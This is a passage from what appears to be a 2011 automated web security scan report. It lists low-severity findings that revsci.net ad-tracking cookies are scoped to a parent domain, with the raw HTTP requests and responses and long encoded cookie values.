mN2MaEjuKRrVmJSzqNZmh0x5x0hVAWhvDCA6BQ8FqURZOCjqiH855mK3sqrup8s9L575P6tOzqW+ELCikSWwQiD/rx6yC1ctz6JfgsHUxL/rL3votvgwb/LGRti+7H3kVCl9G6uLaFSLY+1s9TVi6UljYns+9am2lNzqBE+sU45KIU4GY8u2WzpZX4Ld8Yigo7e9/abK31FsoQmLbMaz1P74S+sDcEiJ4oWmF9VqG3rbSWLTeWUJitVffrmUsR7xX0lmqbeQfLJtqAluaSY6y2F/alYff21IhnXTYPCYpUkTvZkXhv6BHjJ6P/a5/Mh69xWI944EzdWuRfCcJwmoVgN153bYSgyI6QpIcpLQkHuO6sjKJBohE+ys1eJjPEoXv4W1EFnjDl0h1TmUa0rmbH5cYklENBB5/cOBBYp3a3USnRbzKram0vxrk079Ws+1K8Mt2U045VMtb5ivYkxcbr6FGY3s6SYtrXLaLTRbBjVo1pKj9pmdtZ6lk99hp9wDxSd0u5K3S6XtmXbeRa9+g5CWFYEKJfrSfc0kisnL62cdXUru+r5ojxK/0DeyTtj7fSvaHqDc9ISY798hb62fjZwKRBW/ueUh+twiJW3yUJEBhtXsBTpUHf0gdCP8Y4/SFUEX1bRFovccDqjGMrtEnFHGofgmJuuEXzNvTKqgLX/Nn+XI5tLJ9ooObBocSauhYtCLuxKu4RTtf7GiFsV2rM33nC/EJqkhFJ+SNzYPVDCCyz+QPg2WZ2nt4g/8I3JTnrW+859vtC2bN4tKNyZpgAvdQc9Mix7WWpHNDckUVU8YnwXyKaHZ88+oxhH8XOXTSpG4fRE56kYnFr8Rz7grwObpe7aBmPw1gk7q94Nn+2OGoD8lFxeWdh61/RYVUqT8iLVOiKx52At6FOAKlgkvw8cHdNmGXlFRzxbF4yA="; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05S6hScVxPUgGBhfNF2aTke45VLUIpgSA+24CkWVUlaHJzKU4Rt4+5EdE6wRZEwMhtqkV8tVecrz8zYDPirBQcdZhw+eLiA+vKf8IaWxJPZ0zUN9N+mZU45BtmrY1IhSHSQw8NLNwnCnp3GjAE5o+UShCE83doE5nPJB7rUvLssOKNIlrz9NOW8lII41Z0J/UMg+tZ6lcs/PaOyk=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zOTH7bra64O1NHCyUIakKPhhVhzYHWo07/vimX9eWOHz1Io60LZeoZK0fPDkiGU8HXulrRJtAG5InIPagRevfCEalQGjoIVztNEgbsNgBbQNwDt1/00FPGESYSukjOCdF1MH095+w6kmZgwek1xMiaLo478io+VkwjFp+NXLnMiX9F07sFEz+9pMTLi48TgR70M0yHEBiufdkDpoHw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:58:33 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:58:33 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.148. http://pix04.revsci.net/I10985/b3/0/3/1008211/329181290.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/329181290.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50dfpT/3yJpT7qjRECODDnaNjDw+Y00aHQ2YhnXE9qdN9E/C1TQIk5T/IxSnoCu7tbH3064NEubPeyggStoHw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:45:02 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/329181290.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_ERpj="MLsXtSUNJjhvJpE4W8XcxPALFPJgPeDE7Ff6CLs1Rb8Vycmn5M/kolpihGBj4lmrKbjeS1HjvCqNxuQAGGpiXNNk5yhzPh3l8jxc5guypqiz9BZnKARTfXWibSK3l77QX9tFDTj9A5kkDRuEN30YAuOhJs2CmOnGedOFSdCL18w5NwzEuPHxDJiX+seD/hjd5lu/y4pkJrTtyha4yz+xVZ+0nKQ1vrfuatTG+1XIintKVBy+KSbpwNdADd32REiY4gTwF0IY8NAUS+YeG33svkQyK83RerLPqfnhM1NOMBCclsB5LPMEfUKHEA7zYcuiJVSHopUraO5RA6Nm1PBhLEijQ5uOd7NW5t28CSacHaVXiaGNSnTQTxKo2RP/e2fxUsm8J16emUKjtjmmwTCES2saUSJGsU+h/HgeMcoSDt0uEbVNX3N1fZYRd6NpmEnrDr+TbrNcHLrFl3i5zk8tqdWJ4/B4U77cLHt1Z0SghPQDv+yMIGj+yY0AsaoYtSjQszQmsknEaJqEFGTtAcMsQoES1bCfmVrMMgd6l1mJCEEYcNrwEIEgCoKAvSE4e1qLnZfsLujwSsguE9hpOs9HVIZFS5jGLvOR0oYtjTOe4isdnTavH6OiXRJSHY70Cr+OWtZoaBt4YE2ykHZVFKQWteyOMiG0wQQ+MMe6yzjc6OTo8BtlL65Z0LjmOQQybrpN0LDqAy56PhvVFYggAVaOJNH8dXvCLCIdhK2cXm0Uvt11UfrXdpsXDfFmubsm0ICWm/Ynub0uZ1OFJK90SAzAtfA7KI+Cz7PXoaOhWh8cxz9rSICRoY2RmXoCFJhHKU2JDa6kzvp8QY4i/gH5yR2KvDtj9dghTXDajDg+7MnBW3RWS/IHmZqhyEEe0DuaFY7W/T5FHjWKal4wyQKB6xwBwWbA1+jW9PpYwHsmtJ3JnoK3XCydroWQTN9dp3FcoFSFDVd5va4dSMaw7uS2qZld3DWlV5tpeUV2W3Qr12oXahUrt8/ekOJB31oKbMjTQ/+PEkLayreVCgFS38HoJbRca8dgMt49KTI028/pUCNKuTkoK8CbWI/o9jkK12xn4aZDqwtOO1O44zuwvNNSix6YpIPHVJUswxqRX8jU1/KbLmDV0EOlttp9NwrxWHDu+eWtTdSt9ETRcnCzXb35dMFxqM8+PEhC8WARLiFlca7Pzc6DlR2dnP+SJaW+bysvdcTCeSWvs3H2xf7hCvnVwXXev9dJTApCpXjHyqjRXqffTuQgkWAa7IfaE4+H6h0T1PCR4JaMfatnMSOu5709LXeI/l7kLTEDO4kRaDQ+bD93P+UxIuFerYQ6QQ7QGa+KSvFFqt8uAPd6wERHGzS4+adQRqnfIQ=="; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSw/Y8tJ+gZNnYLLHa8d4Y1v0lUZEkxjU7NelY0QcHuDIduu0zKlUsklaD7QC+F/ow1QxM58Yyl6WnVv/Y03ZZcL5DdBkDKAojc77+KgeO/hZp9ehDhKYyNhnCZCDznJza1s1+3Feci/srO6SxznolswxPWHTz3wcdt94Y16K4URQL3/SaQ47qdzif0HCbjSqNdPz0i6dWRYx+sJ/vZdmv2U9UaUWmVOsa6nAiqu1RtX6tWS8RtN3S1JJKgcLbcfwVCJXvDT/ucveqzkRsVCEcp3VCJy7MrJuCzgShhc8m3KBbg8qQ3AF3lCiMjM2k548QswmYutAebkL8RIEAXL6kMQguxVmt59rl8bUbMEHiltuhakDds27H2600AqNtHEy2Uiw5vNLWfLvgEu9DVOf5eUMeAt5PAiNjd5Uplt0qqSVnAabOl2cXaIyTQpGN2v3qnTggdFXvmkjFzfQDqZRNW2H8/T3D4KuRGTu9pkIwnpOpJqqDL8ZlTqm1tx4nqVc24up7SInWtNx7NFc7BxYxVco7FMzrF92J6UpgIp+yIztei9sPUzKynkQ9sWomHNvCzgP6ccGH8UvNnL5S58r+C3uBIymBfMwCvaXNTp18jRw9bdzEAOKb/rvhJU2MzufW18Ipx1vLGfY/TG4Sp9FjObKnLCuB+4RbNM07gH6sAorjAwk2VCaMxDYuK+Z6En1QLphpu4gVZF2sjYw/FLOFmI14MAcrke79ISvFyZGbyjNp9essYi+wchn4V07oHr4dabBjwFR23PZeiphiesFNb+cyoVNdyhlP9w/XvrRQbPBAWDY0BdGhwUIerxQ+uerOKduwscxIVtB+Mwv0jFEprhvzuE0kVIS28+gd2bm+WSGHVOCMciv9JataWaBZQGfs6pUvPzds1P7KLxuAwEiX2zwbSZB7Gyjxy5Ia+BODCRc7SrZGeKnnpYfoIxNaRDKG7ninMFwF5gUNLyPVADN9lLUNfpYq+gra8ruVatoC9afDD+iMhSFd9G5D6am9KIP5qY5BtyqvGL7PgN9EQlf5YS5uFdp6OAWsS85f4uJA/1M18GXGH6VooGiXZ3BB53qQLC2jhFERFULUGK8hBP05FF0IBwyRZb//TP6jb0nMor7I/obqkaMul59jgfa98a2LGGot+R8wHelSB+bITuTFPB4/gTcZcMN9sMu0jqWHhULTzTbPcaBlbE2KvXKE8ku9tIu7MKwy7jVdpXlHoawd0H4MbxqbO9vbYm7lf62hk2RI+ZhLEO1EbhkxfAZOx+xg/tFdiPIs65RM7YJBjjm7nuYqccHJ+DHGivCJISnoPzJwF93suxVm4QhdhEUnjqX3hKY/uh5XCIullw5AiNguvw6i1jpFs2D5lRxYfgVNHrWm0Lc20ky10XKu3Vdvht6L/iOqM19nqe3Z7xLH8NuacTm9qxpjMhx/Q7zD9eCbQy4Lo2ZtueYSKTE7VS36vSfGiQRYAbOnZoiYCjNGhHMgS7jl7/ACKHvbdfZpAs8Pt8o8wpjCN+nX8GTIMjMqpObF2Z6TGvwbRR/GhLdl0ANbjB7i3Ndem8uI5nAR4x0HYvm3wVNapELV6UykLaLXk7g4jM0riBbq389VxssvAFqeOspZdY5ct9FtzTJ8Acb7Ta0ryFrTieBLl04rUiBNnZgMfeTMAOwIk3ry4lbEwqV1EwF6YBaiQrP0ZBut0SQVbPCVWx/txNRCJR4cfJ5WSMkK9NV051cbH+gZhq8mxB7dDM2Gf9wGjaoasuGCHXB2l6k0="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMKLT2uikdn5vw/ZUsicc4VPat72X0BRE3fmuDUz/xw+ppzybIZwS4Eca2TOPNNPf1VWx+g6q/yqUz7hReIUafnkll3Rq9qruA1HphVsEataiCU4UsktlzVfsKfbGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdrai8EDZe5QGsJaR2lbzBppIqOW4sghTvfDbBz9w6xOnT6rKWeoL4o7hjL6yZJnvXVE/sak4VW1ruM/+CyXwJk4Hw4YSr369H0jhzHFve3eZsYbvQZgRVZoV6WmyP4pc8FRjpph0jIkaE2ykBEPmOdPvvjubwj8UOPw2NfT0LFhCC6vEFB9t1/cqtRkjylQljZ2RzJAkbWrRui4RxWmVp4bbzR7Izh3TZRoFmqM1aWr9MSPbI6BBvgALrK3FApmLgXyl5F5sYnIsytuxFuARhEpmQ232iRqQn4VBfQU+7XmFCi7gwUI1/JSNLf3zVlP93r+tmLtgYjZSu4olovzFDWLZalCAK9m0inSch7wHrKI2jDUlKH251qJet39UNQmd+V5pabMBUMBnSgPn8qcRoMKbm4MH0u9ddDZ35jcBrg7+ztf1TvTm7N6yq2hVkZ7u74bje6nS41oEg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50dfpT/3yJpT7qjRECODDnaNjDw+Y00aHQ2YhnXE9qdN9E/C1TQIk5T/IxSnoCu7tbH3064NEubPeyggStoHw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:45:02 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:45:02 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.149. http://pix04.revsci.net/I10985/b3/0/3/1008211/351391247.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/351391247.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNx6sMzbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbbpeqt1vpEp6PLPFjL00+eBCs6WjLf8zGKgiUktukxMj4LRehjtnrXATA7TZkMbfKjMiLMeNEEm/UfgxIQJtqpQYP/DuRMuCpad6JLNu5xR3q3Nz7Qafk8Wq0LRKXPXAPmKuDfSqNAA52IOTTmAVH8tD0S/YdoWswmaiEBbSz+MwOgD397VGeNFH/TE83MuTYCsr8SOCGmMmVMB6h97ZyxIjBb8MzzuEcOlvCO74c+w4v5CS/NhtPQjnhWFjRE2bGoLNZc0rW2//D6vang55J1GgLZQ6jMWccaEAMvC+smP1f1HkrEbSdzNqMIm1KKdwD840D4c7y3R4hj5u/GQ56eVSwG/SVRdfTdU7/8J9cyK4i587brnOIJfC42UX87URuVyUdQmf+VhpUrQ+FcB2ySMYhO2SOJ36YEeivt82Deapbp+4snD8JZgyt6tgd7D7qFfWLJUvk3U7uuprSNn4w==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:15:17 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/351391247.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
